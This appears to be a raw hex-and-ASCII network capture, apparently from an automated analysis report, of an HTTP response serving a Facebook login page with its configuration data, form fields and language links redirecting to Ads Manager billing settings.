                                                                                                                2022-10-13 11:08:18 UTC5674INData Raw: 2c 22 6d 65 73 73 65 6e 67 65 72 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 77 6f 72 6b 70 6c 61 63 65 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 2c 22 69 6e 73 74 61 67 72 61 6d 64 6f 74 63 6f 6d 22 3a 66 61 6c 73 65 7d 2c 38 32 37 5d 2c 5b 22 43 75 72 72 65 6e 74 55 73 65 72 49 6e 69 74 69 61 6c 44 61 74 61 22 2c 5b 5d 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57
                                                                                                                Data Ascii: ,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":false},827],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_W
                                                                                                                2022-10-13 11:08:18 UTC5675INData Raw: 34 2c 22 64 65 76 69 63 65 4e 61 6d 65 22 3a 22 55 6e 6b 6e 6f 77 6e 22 2c 22 65 6e 67 69 6e 65 4e 61 6d 65 22 3a 22 57 65 62 4b 69 74 22 2c 22 65 6e 67 69 6e 65 56 65 72 73 69 6f 6e 22 3a 22 35 33 37 2e 33 36 22 2c 22 70 6c 61 74 66 6f 72 6d 41 72 63 68 69 74 65 63 74 75 72 65 22 3a 22 36 34 22 2c 22 70 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 22 2c 22 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 2c 22 70 6c 61 74 66 6f 72 6d 46 75 6c 6c 56 65 72 73 69 6f 6e 22 3a 22 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69
                                                                                                                Data Ascii: 4,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"64","platformName":"Windows","platformVersion":"10","platformFullVersion":"10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmedi
                                                                                                                2022-10-13 11:08:18 UTC5677INData Raw: 22 2c 22 41 44 53 5f 45 50 44 5f 49 4d 50 41 43 54 45 44 5f 41 44 56 45 52 54 49 53 45 52 5f 4d 49 47 52 41 54 45 5f 58 43 4f 4e 54 52 4f 4c 4c 45 52 22 2c 22 52 45 43 52 55 49 54 49 4e 47 5f 43 41 4e 44 49 44 41 54 45 5f 50 4f 52 54 41 4c 5f 41 43 43 4f 55 4e 54 5f 44 45 4c 45 54 49 4f 4e 5f 43 41 52 44 22 2c 22 42 49 5a 5f 49 4e 42 4f 58 5f 50 4f 50 5f 55 50 5f 54 49 50 5f 4e 41 56 49 47 41 54 49 4f 4e 5f 42 55 47 5f 46 49 58 22 2c 22 53 52 54 5f 52 45 56 49 45 57 5f 44 49 53 41 42 4c 45 5f 46 45 4c 4c 4f 57 53 48 49 50 5f 52 45 56 49 45 57 22 2c 22 45 4f 5f 53 54 4f 52 45 5f 48 4f 4d 45 5f 50 41 47 45 5f 43 4f 56 49 44 31 39 5f 42 41 4e 4e 45 52 22 5d 7d 2c 22 6b 6f 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 33 4f 73 4c 76 6e 53 48 4e 54 74 22 2c 22 31 47
                                                                                                                Data Ascii: ","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G
                                                                                                                2022-10-13 11:08:18 UTC5678INData Raw: 68 22 2c 22 78 67 34 6b 65 6e 2e 63 6f 6d 22 2c 22 74 65 63 68 6e 6f 70 61 72 6b 2e 72 75 22 2c 22 6f 66 66 69 63 65 64 65 70 6f 74 2e 63 6f 6d 2e 6d 78 22 2c 22 62 65 73 74 62 75 79 2e 63 6f 6d 2e 6d 78 22 2c 22 62 6f 6f 6b 69 6e 67 2e 63 6f 6d 22 2c 22 6e 69 62 69 6f 2e 6e 6f 22 5d 7d 2c 33 38 37 31 5d 2c 5b 22 49 6e 69 74 69 61 6c 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 22 2c 5b 5d 2c 7b 22 64 65 66 65 72 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 69 6e 69 74 69 61 6c 43 6f 6e 73 65 6e 74 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 5d 7d 2c 22 6e 6f 43 6f 6f 6b 69 65 73 22 3a 66 61 6c 73 65 2c 22 73 68 6f 75 6c 64 53 68 6f 77 43 6f 6f 6b 69 65 42 61 6e 6e 65 72 22 3a 66 61 6c 73 65 7d 2c 34 33 32 38 5d 2c 5b 22 54 72 75 73 74 65 64 54 79 70 65 73 43 6f 6e
                                                                                                                Data Ascii: h","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.com","nibio.no"]},3871],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":{"__set":[]},"noCookies":false,"shouldShowCookieBanner":false},4328],["TrustedTypesCon
                                                                                                                2022-10-13 11:08:18 UTC5680INData Raw: 78 74 22 2c 5b 5d 2c 7b 22 47 45 4e 44 45 52 22 3a 33 2c 22 72 65 67 69 6f 6e 61 6c 4c 6f 63 61 6c 65 22 3a 6e 75 6c 6c 7d 2c 37 37 32 5d 2c 5b 22 4e 75 6d 62 65 72 46 6f 72 6d 61 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 64 65 63 69 6d 61 6c 53 65 70 61 72 61 74 6f 72 22 3a 22 2e 22 2c 22 6e 75 6d 62 65 72 44 65 6c 69 6d 69 74 65 72 22 3a 22 2c 22 2c 22 6d 69 6e 44 69 67 69 74 73 46 6f 72 54 68 6f 75 73 61 6e 64 73 53 65 70 61 72 61 74 6f 72 22 3a 34 2c 22 73 74 61 6e 64 61 72 64 44 65 63 69 6d 61 6c 50 61 74 74 65 72 6e 49 6e 66 6f 22 3a 7b 22 70 72 69 6d 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 2c 22 73 65 63 6f 6e 64 61 72 79 47 72 6f 75 70 53 69 7a 65 22 3a 33 7d 2c 22 6e 75 6d 62 65 72 69 6e 67 53 79 73 74 65 6d 44 61 74 61 22 3a 6e 75 6c 6c 7d
                                                                                                                Data Ascii: xt",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null}
                                                                                                                2022-10-13 11:08:18 UTC5681INData Raw: 78 65 6c 5f 74 65 73 74 5c 2f 22 3a 31 2c 22 5c 2f 62 6f 6f 6b 6d 61 72 6b 73 5c 2f 66 6c 79 6f 75 74 5c 2f 62 6f 64 79 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 62 6e 6f 5c 2f 22 3a 31 2c 22 5c 2f 63 6f 6e 66 69 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 69 6e 74 65 72 6e 65 74 64 6f 74 6f 72 67 5c 2f 63 6c 61 73 73 69 66 69 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 6f 67 66 6f 6f 64 69 6e 67 22 3a 31 2c 22 5c 2f 78 74 69 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 66 62 6c 69 74 65 5c 2f 63 6f 6e 66 69 67 5c 2f 22 3a 31 2c 22 5c 2f 68 72 5c 2f 7a 73 68 5c 2f 77 63 5c 2f 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 62 6f 6f 74 6c 6f 61 64 65 72 2d
                                                                                                                Data Ascii: xel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/confirmemail.php":1,"\/policies\/":1,"\/mobile\/internetdotorg\/classifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-
                                                                                                                2022-10-13 11:08:18 UTC5682INData Raw: 72 6d 65 6d 61 69 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 63 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 64 61 74 61 70 6f 6c 69 63 79 22 3a 31 2c 22 5c 2f 61 5c 2f 74 69 6d 65 7a 6f 6e 65 2e 70 68 70 22 3a 31 2c 22 5c 2f 61 5c 2f 62 7a 22 3a 31 2c 22 5c 2f 62 7a 5c 2f 72 65 6c 69 61 62 69 6c 69 74 79 22 3a 31 2c 22 5c 2f 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 6d 72 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 5c 2f 22 3a 31 2c 22 5c 2f 72 65 67 69 73 74 72 61 74 69 6f 6e 5c 2f 6c 6f 67 5c 2f 22 3a 31 2c 22 5c 2f 74 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 66 31 32 33 5c 2f 22 3a 31 2c 22 5c 2f 65 78 70 65 72 74 5c 2f 22 3a 31 2c 22 5c
                                                                                                                Data Ascii: rmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"\/zero\/datapolicy":1,"\/a\/timezone.php":1,"\/a\/bz":1,"\/bz\/reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\
                                                                                                                2022-10-13 11:08:18 UTC5684INData Raw: 35 66 38 30 0d 0a 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 59 55 4e 44 51 44 49 79 44 53 66 6c 41 69 58 59 62 5f 31 75 6b 4d 4e 51 77 77 77 2d 78 68 4a 51 52 6c 37 61 76 67 6e 70 79 6a 42 6f 73 72 55 48 37 49 73 59 52 50 51 4f 6d 64 6d 4c 66 48 67 30 59 4b 30 75 41 5f 66 43 4a 5a 62 46 48 35 79 56 78 6d 6d 49 4c 68 35 57 50 7a 5a 58 34 7c 66 64 2e 41 63 59 48 7a 33 5a 41 64 50 6d 48 49 67 32 42 58 44 45 71 68 46 6e 76 62 52 56 36 5a 2d 4a 2d 77 4d 57 6d 35 39 61 53 76 61 77 56 52 4c 6c 4a 4e 33 36 58 6c 69 46 6c 70 4a 43 39 66 4e 72 62 49 4f 47 7a 41 41 55 6e 47 58 36 31
                                                                                                                Data Ascii: 5f80rrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"$^|AcYUNDQDIyDSflAiXYb_1ukMNQwww-xhJQRl7avgnpyjBosrUH7IsYRPQOmdmLfHg0YK0uA_fCJZbFH5yVxmmILh5WPzZX4|fd.AcYHz3ZAdPmHIg2BXDEqhFnvbRV6Z-J-wMWm59aSvawVRLlJN36XliFlpJC9fNrbIOGzAAUnGX61
                                                                                                                2022-10-13 11:08:18 UTC5685INData Raw: 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 30 68 53 74 4e 45 4d 6e 4c 6a 6d 59 70 61 37 66 52 70 78 2d 4c 69 56 30 65 71 45 5a 58 65 47 79 45 57 5f 6a 42 65 54 48 45 43 6c 48 7a 4b 38 38 54 4a 6f 35 69 48 4a 45 43 55 6f 4e 51 36 45 63 46 52 67 59 4b 34 59 47 54 75 6a 57 52 58 35 6e 61 65 6c 59 6b 6a 36 59 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 30 33 32 36 37 22 2c 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65
                                                                                                                Data Ascii: YK4YGTujWRX5naelYkj6Yg"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa0hStNEMnLjmYpa7fRpx-LiV0eqEZXeGyEW_jBeTHEClHzK88TJo5iHJECUoNQ6EcFRgYK4YGTujWRX5naelYkj6Yg"]},-1],["cr:1003267",["clearIntervalBlue
                                                                                                                2022-10-13 11:08:18 UTC5686INData Raw: 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 70 72 6f 66 69 6c 65 5f 65 61 67 65 72 5f 65 78 65 63 75 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 64 69 73 61 62 6c 65 5f 68 65 75 72 69 73 74 69 63 22 3a 74 72 75 65 2c 22 64 69 73 61 62 6c 65 5f 65 76 65 6e 74 5f 70 72 6f 66 69 6c 65 72 22 3a 66 61 6c 73 65 7d 2c 31 37 32 36 5d 2c 5b 22 41 64 73 49 6e 74 65 72 66
                                                                                                                Data Ascii: 200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_instrumentation":false,"profile_eager_execution":false,"disable_heuristic":true,"disable_event_profiler":false},1726],["AdsInterf
                                                                                                                2022-10-13 11:08:18 UTC5688INData Raw: 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 35 36 35 39 32 39 38 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30 5f 36 74 22 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 61 72 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 62 5f 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 20 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 34 2d 75 35 20 5f 33 30 6e 79 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 39 37 76 79 22 3e 3c 69 6d 67 20 63 6c 61 73 73 3d 22
                                                                                                                Data Ascii: apWebSession"],function(j){j(1665659298)})</script><div class="_li" id="u_0_0_6t"><div id="globalContainer" class="uiContextualLayerParent"><div class="fb_content clearfix " id="content" role="main"><div class="_4-u5 _30ny"><div class="_97vy"><img class="
                                                                                                                2022-10-13 11:08:18 UTC5689INData Raw: 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 73 6b 69 70 5f 61 70 69 5f 6c 6f 67 69 6e 22 20 6e 61 6d 65 3d 22 73 6b 69 70 5f 61 70 69 5f 6c 6f 67 69 6e 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 73 69
                                                                                                                Data Ascii: "isprivate" value="" /><input type="hidden" autocomplete="off" id="return_session" name="return_session" value="" /><input type="hidden" autocomplete="off" id="skip_api_login" name="skip_api_login" value="" /><input type="hidden" autocomplete="off" id="si
                                                                                                                2022-10-13 11:08:18 UTC5691INData Raw: 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 2f 3f 61 72 73 3d 66 61 63 65 62 6f 6f 6b 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 5f 39 37 77 34 22 20 74 61 72 67 65 74 3d 22 22 3e 46 6f 72 67 6f 74 20 61 63 63 6f 75 6e 74 3f 3c 2f 61 3e 3c 73 70 61 6e 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 20 c2 b7 20 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 2f 72 2e 70
                                                                                                                Data Ascii: it">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" class="_97w4" target="">Forgot account?</a><span role="presentation" aria-hidden="true"> </span><a href="/r.p
                                                                                                                2022-10-13 11:08:18 UTC5692INData Raw: 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d 6e 65 77 20 52 65 67 45 78 70 28 61 2b 22 3d 28 2e 2a 3f 29 28 3b 7c 24 29 22 29 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 3f 52 65 67 45 78 70 2e 24 31 3a 6e 75 6c 6c 7d 62 28 22 63 5f 75 73 65 72 22 29 26 26 21 77 69 6e 64 6f 77 2e 5f 5f 63 61 6e 63 65 6c 43 6f 6f 6b 69 65 52 65 6c 6f 61 64 26 26 28 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 77 69 6e 64 6f 77 2e 5f 5f 63 6f 6f 6b 69 65 52 65 6c 6f 61 64 29 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 61
                                                                                                                Data Ascii: tion pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document.cookie)?RegExp.$1:null}b("c_user")&&!window.__cancelCookieReload&&(window.clearInterval(window.__cookieReload),window.location=a
                                                                                                                2022-10-13 11:08:18 UTC5694INData Raw: 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d
                                                                                                                Data Ascii: ;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 1); return false;" title=
                                                                                                                2022-10-13 11:08:18 UTC5695INData Raw: 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 73 71 5f 41 4c 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74
                                                                                                                Data Ascii: ings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount
                                                                                                                2022-10-13 11:08:18 UTC5697INData Raw: 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 61 72 5f 41 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65
                                                                                                                Data Ascii: 2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.face
                                                                                                                2022-10-13 11:08:18 UTC5698INData Raw: 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66 79 3d 22 2f 73 65 74 74 69 6e 67 73 2f 6c 61 6e 67 75 61 67 65 2f 6c 61 6e 67 75 61 67 65 2f 3f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 6c 6f 67 69 6e 2e 70 68 70 25 33 46 6e 65 78 74 25 33 44 68 74 74 70 73 25 32 35 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 35 32 46 61 64 73 25 32 35 32 46 6d 61 6e 61 67 65 72 25 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 35 32 46 61 63 63 6f 75 6e
                                                                                                                Data Ascii: li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccoun
                                                                                                                2022-10-13 11:08:18 UTC5700INData Raw: 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 25 32 46 26 61 6d 70 3b 68 3d 41 54 32 4b 44 58 30 5f 78 6d 35 74 48 56 36 45 74 6c 5a 79 31 46 56 45 30 53 52 73 6e 63 56 53 74 34 77 47 4f 34 4d 43 45 32 77 2d 4a 36 6d 66 61 35 43 6b 72 70 73 75 63 45 44 4e 34 35 42 64 47 70 55 47 36 70 76 45 45 4a 30 58 63 62 52 73 2d 70 39 44 59 50 36 4b 4e 37 44 71 7a 43 36 70 39 61 34 68 32 43 38 56 72 6f 38 70 33 34 6e 63 62 76 53 38 6f 6a 49 74 67 65 48 46 45 71 48 63 66 58 32 74 6b 4b 30 70 5f 57 4e 44 42 46 2d 59 47 4f 34 58 77 67 22 20
